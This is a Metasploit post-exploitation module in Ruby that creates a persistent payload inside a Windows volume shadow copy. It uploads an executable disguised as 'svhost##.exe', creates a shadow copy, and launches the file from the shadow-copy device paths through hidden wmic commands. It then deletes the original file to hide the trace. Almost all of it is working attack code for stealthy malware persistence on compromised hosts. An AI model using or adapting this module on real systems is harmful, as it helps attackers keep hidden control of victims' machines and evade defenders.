vss_persistence.rb by @MrXors

1. require 'msf/core'
2. require 'rex'
3. require 'msf/core/post/windows/shadowcopy'
4. require 'msf/core/post/windows/priv'
5. require 'msf/core/post/common'
6. class Metasploit4 < Msf::Post
7.  
8.   include Msf::Post::Windows::Priv
9.   include Msf::Post::Windows::ShadowCopy
10.   include Msf::Post::Common
11.  
12.   def initialize(info={})
13.  
14.     super(update_info(info,
15.       'Name'                 => "Windows Manage Create Persistant Payload in Shadow Copy",
16.       'Description'          => %q{
17.         This module will attempt to create a persistant payload
18.         in new volume shadow copy.This is based on the VSSOwn
19.         Script originally posted by Tim Tomes and Mark Baggett.
20.         Works on win2k3 and later.
21.         },
22.       'License'              => MSF_LICENSE,
23.       'Platform'             => ['win'],
24.       'SessionTypes'         => ['meterpreter'],
25.       'Author'               => ['MrXors'],
26.       'References'           => [[ 'URL', 'http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html' ]]
27.     ))
28.  
29.     register_options(
30.       [
31.         OptString.new('VOLUME', [ true, 'Volume to make a copy of.', 'C:\\']),
32.         OptString.new('PATH', [ true, 'Path to exe on local system.'])
33.       ], self.class)
34.   end
35.  
36.   def upload(session,file,trgloc = "")
37.     if not ::File.exists?(file)
38.       raise "File to Upload does not exists!"
39.     else
40.       if trgloc == ""
41.         location = session.fs.file.expand_path("%TEMP%")
42.       else
43.         location = trgloc
44.       end
45.       begin
46.         ext = file[file.rindex(".") .. -1]
47.         if ext and ext.downcase == ".exe"
48.           file_name  = "svhost#{rand(100)}.exe"
49.           fileontrgt = "#{location}\\#{file_name}"
50.         else  
51.           fileontrgt = "#{location}\\TMP#{rand(100)}#{ext}"
52.         end
53.         print_status("\tUploading #{file}....")
54.         session.fs.file.upload_file("#{fileontrgt}","#{file}")
55.         print_status("\t#{file} uploaded!")
56.         print_status("\tUploaded as #{fileontrgt}")
57.       rescue ::Exception => e
58.         print_status("Error uploading file #{file}: #{e.class} #{e}")
59.         raise e
60.       end
61.     end
62.     #Create Vss Shadow Copy
63.     unless is_admin?
64.       print_error("This module requires admin privs to run")
65.       return
66.     end
67.     if is_uac_enabled?
68.       print_error("This module requires UAC to be bypassed first")
69.       return
70.     end
71.     unless start_vss
72.       return
73.     end
74.     id = create_shadowcopy(datastore['VOLUME'])
75.     if id
76.       print_good "Shadow Copy #{id} created!"
77.     end
78.     digits = 0..30
79.     digits.each do |digit|
80.       run_malware = session.sys.process.execute("cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe process call create \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy#{digit}\\#{file_name}", nil, {'Hidden' => true})
81.     end
82.     print_good("Deleting Maleware #{location}\\#{file_name}!")
83.     juice = session.sys.process.execute("cmd.exe /c del C:\\#{file_name}", nil, {'Hidden' => true})
84.     juice.close
85.     return fileontrgt
86.   end
87.   def run
88.     print_status("Uploading Payload to machine.")
89.     upload(session,"#{datastore['PATH']}","C:\\")
90.   end
91. end